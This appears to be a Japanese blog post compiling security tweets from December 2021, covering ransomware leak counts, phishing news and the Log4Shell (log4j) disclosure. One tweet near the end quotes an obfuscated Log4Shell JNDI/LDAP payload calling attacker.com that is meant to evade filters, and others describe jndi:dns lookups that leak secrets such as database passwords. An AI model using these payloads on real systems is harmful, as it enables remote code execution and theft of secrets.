2021/12/12 セキュリティ関連Twitterメモ
I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: https://t.co/CqJcmTzygA #malware https://t.co/JASeRCzxKA
— Alexandre Borges (@ale_sp_brazil) Dec 4, 2021
11月の #ランサムウェア リーク確認数 カッコ内は前月確認数 1???#Lockbit2 86(82) 2???#CONTI 47(46) 3???#Grief 10(15) 4???#CL0P 5(11) 5???#BlackMatter 1(12) 6???#Ragnar 1(2) 7???#RansomExx 1(1) 8???#Revil 0(3) 9???#Nefilim 0(0) 9???#Prometheus 0(0) 9???#DoppelPaymer 0(0) Total 151 https://t.co/vTFTCxjISw
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 5, 2021
CVE数の動向と考察(2021年版)Part1 https://t.co/lSc6zxyUGj
— piyokango (@piyokango) Dec 6, 2021
おお!事業者(LINE、Yahoo!、PayPay/PayPay銀行)共催のフィッシング詐欺サイトバウンティキャンペーンですか! これは素晴らしい企画。 意外と他で実施していないですよね?私が知らないだけ? 参加方法も手軽なのが素晴らしい。 https://t.co/XasHqaCwHb
— Noriaki Hayashi (@v_avenger) Dec 6, 2021
Best of CTF Walkthrough for OSCP https://t.co/AIUdoUaDV6 https://t.co/JxuTswFwbn https://t.co/HLfe9mGFVN #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #itsecurity #cissp #redteam #hackingtools #linux https://t.co/j7ZQyBwQxl
— Hacking Articles (@hackinarticles) Dec 7, 2021
『「次の1日間、BTCに送られるすべての支払いを2倍にします。あなたは1000ドル送ります。私はあなたに2000ドル送り返します」』 アンジャッシュ渡部、インスタに不正アクセスか?ストーリーに怪しげ文書アップ/芸能/デイリースポーツ online https://t.co/jDLK6FpiCe
— Autumn Good (@autumn_good_35) Dec 7, 2021
Love this Ransomware Playbook published by Canadian Centre for Cyber Security: https://t.co/8TA0xZl4wK https://t.co/PADQ2phAgi
— Seongsu Park (@unpacker) Dec 7, 2021
GitHub上のsensitive dataを削除するための手順と道のり https://t.co/I86XBcoJvt
— モグ|セキュリティゼネラリスト (@moneymog) Dec 7, 2021
フィッシング詐欺やマルウェアなど、セキュリティ対策の最新動向を専門家らが解説【JPAAWG 4th General Meeting】 - INTERNET Watch https://t.co/HJWWYh4GNq @internet_watchより
— にゃん☆たく (@taku888infinity) Dec 8, 2021
ランサムウエア配信システムに危機感 - 2022年版ソフォス脅威レポート https://t.co/027539M2yD
— モグ|セキュリティゼネラリスト (@moneymog) Dec 8, 2021
GitHub上のsensitive dataを削除するための手順と道のり | メルカリエンジニアリング https://t.co/5MwS26C7qq
— piyokango (@piyokango) Dec 9, 2021
オミクロン株で偽メール 厚労省装い、情報流出恐れ | 共同通信 https://t.co/Jc54sVNEz4
— piyokango (@piyokango) Dec 9, 2021
log4j 各?网?已?笑死 ???史了 https://t.co/erJvuze4Sn
— ?面 (@zhimian000) Dec 9, 2021
RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec https://t.co/hxoTYC5nSt Javaでログ出力するために使われるライブラリlog4j 2のRCEの0-day脆弱性がやばそう。裏で実はlog4j 2を使っているということもありそうなので、影響範囲を特定するのが難しそう
— ほよたか (@takahoyo) Dec 10, 2021
log4jのセキュリティバグ、すごいな。任意コード実行というけど、ほんとに任意コード実行じゃん(インターネットから簡単に任意のJavaクラスファイルをロードして実行させられる)。
— Rui Ueyama (@rui314) Dec 10, 2021
マイクラもハッキング ~「Apache Log4j」ライブラリに致命的なリモートコード実行のゼロデイ脆弱性/かなり広範囲に影響か。一刻も早い対策が望まれる【やじうまの杜】 https://t.co/lUUfGMhVIp https://t.co/kKVe89M8kk
— 窓の杜 (@madonomori) Dec 10, 2021
Best of OSINT Cheatsheet (Part 2) Credit https://t.co/9QY8ncwRqY #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #cissp #redteam #hackingtools #Windows #DataSecurity #privacy #OSINT https://t.co/Y6wZ4cVigL
— Hacking Articles (@hackinarticles) Dec 10, 2021
きたよ。。。 #log4j #log4j2 https://t.co/u1wJ8rB6z3
— moto_sato (@58_158_177_102) Dec 10, 2021
Welp. (log4j is incredibly common, although it sounds like the underlying vulnerability stems from people essentially directly printf-ing strings from users, like printf(user_string) instead of printf("%s", user_string).) https://t.co/zjLigHU0Mn
— Xenoveritas (@xenoveritas) Dec 10, 2021
log4j2の件、 - 情報をキャッチできるアンテナがある - 一次情報から攻撃方法と影響を読み取れる - 対象システムを即時に調査できる権限がある - Javaのクラスローダーについて知識がある - Javaのロギング事情がカオスなことを知っている という条件が揃ったエンジニアが必要なので多分沢山やられる。
— 嶋田大貴 (@shimariso) Dec 10, 2021
ちゃんと読まないとだめだな https://t.co/XIJo5Q9bYK
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021
log4j、修正コミット見ればわかるんですが、"jndi:ldap:/"だけじゃなくて"jndi:dns:/"も効きました。脆弱性の有無調査を行うだけの攻撃ではこちらも使われると思うので、ログ調査する人は気を付けて (画像はlog4j同梱のGhidraで検証した) https://t.co/3x3stiN4Aw https://t.co/8rCe5QBmCf
— しゅーと (@shutingrz) Dec 10, 2021
もうこれインターネットの終わりでしょ https://t.co/2IuBTLyLHx
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021
Log4j zero-day gets security fix just as scans for vulnerable systems ramp up https://t.co/OFAjCxjS3i
— piyokango (@piyokango) Dec 10, 2021
“log4jの脆弱性について” https://t.co/eCVcy9Su8v
— トマ村 (@tmhwq) Dec 10, 2021
CVE-2021-44228 - Log4j RCE 0-day mitigation with Cloudflare. https://t.co/aP4ZEAQL8H
— Cloudflare (@Cloudflare) Dec 10, 2021
SANSのInternet Storm CenterのThret LevelがYellowになってる。見始めたのはここ数年だけど、初めて見たかもしれない https://t.co/qtUDeYSRPn https://t.co/FFDDQ9np2A
— ほよたか (@takahoyo) Dec 10, 2021
思ったより拡散されてたのでコメントしますが、このdnsを使うのは元ツイにあるように「脆弱性の有無調査を行うだけ」を目的とした人だけです。名前解決が発生するだけで、これを利用してJNDIインジェクションはできません。これを読んでdnsでRCEできると思った人がいるっぽいので念のため...
— しゅーと (@shutingrz) Dec 10, 2021
各種情報が追加されたので補足。情報漏えいを目的とする攻撃でもdnsを使われると思います。あくまでdnsスキーマで効かないのはJNDIインジェクション。画像は環境変数のMYSQL_PASSWORDを名前解決をさせて情報漏えうさせる通信です。 https://t.co/YVDaBTlIhu
— しゅーと (@shutingrz) Dec 11, 2021
『dns』文字列では、RCEまで行かず、情報漏洩にはつながりそうな状況のようです。参照される方は、しゅーとさんの返信内容まで合わせて確認いただけると良いと思います。 https://t.co/eC4IuYHBQT
— モグ|セキュリティゼネラリスト (@moneymog) Dec 11, 2021
海外主要ソースが軒並みLog4jを報じています。 あっ。怖い事書いてあるな・・・。 「Log4j RCE:広く使用されているロギングユーティリティの重要な認証なしのコード実行ホールを塞ぐために発行された緊急パッチ」 https://t.co/LIbRFI5zem
— キタきつね (@foxbook) Dec 10, 2021
@hasegawayosukeさん、@kinugawamasatoさん、にしむねあさんとWebセキュリティやキャリアについて雑談しました! https://t.co/AudR2PYn2q
— Jun Kokatsu (@shhnjk) Dec 10, 2021
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j
— Brandon Forbes (@Rezn0k) Dec 11, 2021
Log4j2のコード実行脆弱性Log4Shell (CVE-2021-44228)についてのCrowdStrike記事。既に実際の悪用が確認されている。最新版ではJNDIセッションセキュリティ管理の制御設定が追加。NWでの推奨緩和策は、サーバからの外向き通信は信頼できるホスト・プロトコルのみとすること。 https://t.co/uMIxjTTUeZ
— kokum?t? (@__kokumoto) Dec 11, 2021